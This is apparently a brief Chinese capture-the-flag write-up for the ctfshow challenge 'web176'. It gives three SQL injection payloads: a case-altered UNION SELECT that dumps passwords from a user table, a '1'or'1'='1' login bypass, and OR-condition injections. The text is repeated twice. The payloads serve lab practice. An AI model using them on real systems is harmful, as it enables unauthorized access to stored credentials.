web176
尝试得,过滤了select。使用大小写绕过select ,得flag
方法1:1' union Select 1,password,3 from ctfshow_user --+
方法2:万能密码绕过 1'or'1'='1
方法3:999' or username='flag OR 999' or id='26
尝试得,过滤了select。使用大小写绕过select ,得flag
方法1:1' union Select 1,password,3 from ctfshow_user --+
方法2:万能密码绕过 1'or'1'='1
方法3:999' or username='flag OR 999' or id='26